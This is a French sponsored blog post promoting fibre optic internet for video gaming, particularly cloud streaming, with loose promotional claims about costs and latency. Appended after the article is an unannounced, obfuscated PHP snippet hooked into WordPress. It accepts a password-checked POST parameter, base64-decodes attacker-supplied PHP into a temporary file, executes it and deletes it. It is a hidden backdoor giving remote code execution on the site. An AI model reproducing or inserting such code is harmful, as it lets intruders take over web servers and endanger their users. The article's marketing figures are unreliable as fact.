Pourquoi jouer aux jeux vidéo avec la technologie de la fibre optique ?

Pourquoi jouer aux jeux vidéo avec la technologie de la fibre optique ? Posted on octobre 6, 2021

Se distraire est nécessaire pour mieux se ressourcer et garder le sourire. Mais, il faut que les jeux auxquels vous jouerez ne vous fassent pas trop dépenser et vous permettent d’avoir une bonne expérience. Pour atteindre cet objectif, vous devez opter pour la fibre optique. Ceci s’explique par le fait qu’elle offre un excellent débit. En effet, les différentes raisons de jouer aux jeux vidéo avec cette technologie sont présentées dans ce billet.

Jouer aux jeux vidéo en streaming (ils sont plus avantageux financièrement)

Avec la technologie de la fibre optique, vous pouvez jouer aisément aux jeux vidéo en streaming. En effet, pour jouer à ces types de jeux, il suffit d’avoir une connexion internet ayant un débit élevé. Et, c’est ce que vous offre justement la technologie de la fibre optique (300 Mb/s minimum). Pour jouer à ces différents jeux, il vous faudra simplement le matériel pour les fibres optiques.

Avec les jeux vidéo en streaming, vous n’avez plus besoin d’acheter des consoles de jeux à 400 euros. De plus, vous n’aurez plus besoin de débourser 1000 euros pour acheter un PC gamer. Il faut aussi dire que vous ne payerez plus d’abonnement par mois.

De même, pour vous faire plaisir, vous ne serez plus obligé de payer un jeu à plus de 60 euros. Cela dit, grâce à ces jeux, vous ne dépenserez plus grand-chose pour vous divertir aujourd’hui. C’est donc un bon moyen d’être éligible à la fibre optique aujourd’hui.

Autres avantages de s’intéresser aux jeux vidéo en streaming

Il faut noter qu’avec ces jeux, vous pouvez passer d’un support à un autre sans aucun problème. Il suffit que vos différents terminaux soient connectés à internet au travers de la fibre optique. Autrement dit, vous pouvez commencer le jeu de votre choix sur votre ordinateur et terminer la partie sur votre smartphone ou votre tablette.

De manière plus précise, vous n’avez pas de téléchargement à faire, car aucune installation n’est nécessaire ici. Cela dit, vous aurez suffisamment d’espace libre sur votre PC, votre tablette ou ordinateur. En tout cas, ces jeux n’occuperont aucun espace sur vos supports. C’est pour tout cela qu’il est avantageux de jouer aux jeux vidéo avec la technologie de la fibre optique. Et ce n’est pas tout.

Profiter d’une meilleure expérience utilisateur

Il faut savoir qu’en jouant aux jeux en ligne avec la fibre optique, vous ne serez point déçu. Grâce à cette technologie, vous pouvez diffuser une importante quantité de données sans aucune peine. En effet, la fibre optique diffuse les informations à la vitesse de la lumière.

En jouant à ces jeux, vous aurez besoin de transmettre de la voix, du son et de l’image. Toutes ces données sont envoyées sans que vous remarquiez de ralentissement. Ces jeux seront donc une partie de plaisir pour vous. Il faut aussi dire que les images seront bien nettes.

Par ailleurs, sachez que le temps de latence est plus bas que ce que vous aurez avec la technologie de l’ADSL. Vous ne remarquerez quasiment pas de décalage entre le moment où vous faites une action avec votre manette ou vos touches et le moment où vous constaterez l’action dans le jeu. Ici, le temps de réponse est de trois millisecondes. Pour l’ADSL, il est de 30 millisecondes.

Ainsi, vous aurez plus de plaisir à jouer avec le débit que vous offre la fibre optique. Cet avantage vous permettra de remporter plus facilement les parties de jeux si vous prenez part à des jeux massivement multijoueurs en ligne.

 

Note : article publi-rédactionnel

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}